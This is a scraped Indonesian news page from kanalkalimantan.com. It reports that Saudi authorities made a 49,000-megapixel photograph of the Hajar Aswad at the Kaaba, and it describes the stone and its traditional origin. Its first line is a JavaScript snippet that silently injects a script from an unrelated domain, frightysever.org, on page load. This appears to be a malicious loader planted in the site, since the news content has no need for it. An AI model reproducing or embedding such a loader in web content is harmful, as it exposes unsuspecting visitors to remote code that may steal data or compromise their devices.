(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
FENOMENA

Subhanallah, Ini Penampakan Batu Surga Hajar Aswad Paling Jelas


KANALKALIMANTAN.COM – Hajar aswad adalah sebuah batu hitam yang terletak di Masjidi Haram, Mekkah. Batu ini biasanya menjadi rebutan para jemaah haji dan umrah untuk menciumnya.

Sehingga ketika musim haji tiba sangat sulit untuk bisa mendekati apalagi mencium batu hajar aswad. Mencium hajar aswad adalah sunah Nabi Muhammad SAW.

Rasulullah SAW selalu mencium hajar aswad setiap melakukan tawaf saat berada di Masjidil Haram. Berdasarkan riwayat, batu hajar aswad adalah batu yang berasal dari surga.

Lalu seperti apa penampakan batu hajar aswad itu sendiri? Terbaru pihak Arab Saudi memfoto hajar aswad dengan teknologi tinggi.

 

Baca Juga:
2021 Diprediksi Kalsel Masih Surplus Beras

Dilansir dari ANTARA, Presidensi Umum Urusan Dua Masjid Suci Arab Saudi baru-baru ini mendokumentasikan foto Hajar Aswad di Kakbah dalam Masjidil Haram menggunakan teknik fokus panorama bertumpuk.

penampakan hajar aswad. [Reasahalharmain]

Dalam teknik itu, foto-foto dengan kejernihan berbeda digabungkan untuk menghasilkan satu foto dengan tingkat akurasi dan kualitas tinggi.

Butuh tujuh jam untuk mengambil foto hingga 49.000 megapiksel. Dilansir Tribune, Selasa, ini adalah kali pertama dunia bisa melihat lebih dekat Hajar Aswad.

batu hajar aswad. [Reasahalharmain]

Gambar yang diambil sangat jelas sehingga setiap orang bisa melihat setiap bagian batu yang tidak terlihat sebelumnya.

Hajar Aswad terletak di sudut timur Kakbah dan terlihat seperti satu batu yang terlindung dalam bingkai perak, tetapi sebetulnya Hajar Aswad terdiri dari delapan batu kecil yang digabung dengan frankincense Arab.

Baca Juga:
Hardiknas di Tengah Pandemi, Ini Komentar Ketua DPRD Banjarbaru

Batu terkecil ukurannya tak lebih dari 1 cm, yang terbesar tidak melebihi ukuran 2 cm. Bingkai yang dibuat dari perak berfungsi sebagai pelindung dari batu suci itu.

Berdasarkan buku sejarah, Hajar Aswad yang berasal dari surga ditempatkan di Kakbah oleh Nabi Ibrahim setelah diberikan oleh malaikat Jibril. (antara)


Al Ghifari

Share
Published by
Al Ghifari

Recent Posts

5 Mei Hari Bidan Sedunia

KANALKALIMANTAN.COM – Negara-negara di dunia merayakan Hari Bidan Sedunia yang jatuh pada 5 Mei setiap… Read More

5 jam ago

Syamsudin Noor Jadi Bandara Domestik, Begini Respon Wali Kota Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Pencopotan status internasional pada Bandara Syamsudin Noor Banjarmasin yang terletak di Kota… Read More

6 jam ago

Presiden Jokowi di Booth PLN PEVS 2024, Dirut PLN Paparkan Kesiapan Ekosistem Kendaraan Listrik

KANALKALIMANTAN.COM, JAKARTA - Presiden Republik Indonesia Joko Widodo (Jokowi) mengunjungi booth PT PLN (Persero) dalam… Read More

8 jam ago

Akhir Pekan Pasti Hemat, Berikut Promo BRI hingga 30 Persen di 8 Kota Indonesia

KANALKALIMANTAN.COM – Bagi sebagian orang, akhir pekan (weekend) merupakan waktu yang dinanti. Sembari rehat bekerja,… Read More

12 jam ago

Diskusi Santai “Komunitas Gembel Banjarmasin” Bahas Kesejahteraan Buruh

KANALKALIMANTAN.COM, BANJARMASIN - Masih dalam momentum Hari Buruh 2024, Komunitas Gemar Belajar (Gembel) Banjarmasin menggelar… Read More

21 jam ago

Penyediaan Rumah ASN dan Tenaga Kontrak, Pemkab Kapuas Gandeng Pengembang Perumahan

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat Bupati Kapuas Erlin Hardi melakukan penandatanganan MoU antara PT Mahakarya… Read More

21 jam ago

This website uses cookies.